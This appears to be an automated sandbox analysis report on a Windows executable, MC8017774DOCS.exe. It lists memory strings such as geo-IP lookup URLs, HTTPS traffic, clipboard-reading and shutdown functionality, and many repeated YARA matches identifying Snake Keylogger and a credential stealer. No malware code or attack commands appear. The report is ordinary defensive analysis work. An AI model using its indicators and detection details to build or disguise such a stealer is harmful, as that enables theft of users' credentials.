Source: MC8017774DOCS.exe, 00000004.00000001.2521521176.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033D7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DA8000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033E15000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033DED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F4E000.00000004.00000800.00020000.00000000.sdmp, MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F3F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: MC8017774DOCS.exe, 00000004.00000002.3476754356.0000000033F49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49907 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

0_2_0040543E

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

Creates files inside the system directory

Source: C:\Users\user\Desktop\MC8017774DOCS.exe

File created: C:\Windows\resources\0809

Detected potential crypto function

Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_00404C7B	0_2_00404C7B
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 0_2_6E9B1B63	0_2_6E9B1B63
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E43AAC	4_2_03E43AAC
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E4B978	4_2_03E4B978
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E44BC8	4_2_03E44BC8
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E41B4C	4_2_03E41B4C
Source: C:\Users\user\Desktop\MC8017774DOCS.exe	Code function: 4_2_03E469D1	4_2_03E469D1

Sample file is different than original file name gathered from version info

Source: MC8017774DOCS.exe, 00000004.00000003.2639623192.0000000035F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3476036769.0000000033A77000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe

Source: MC8017774DOCS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
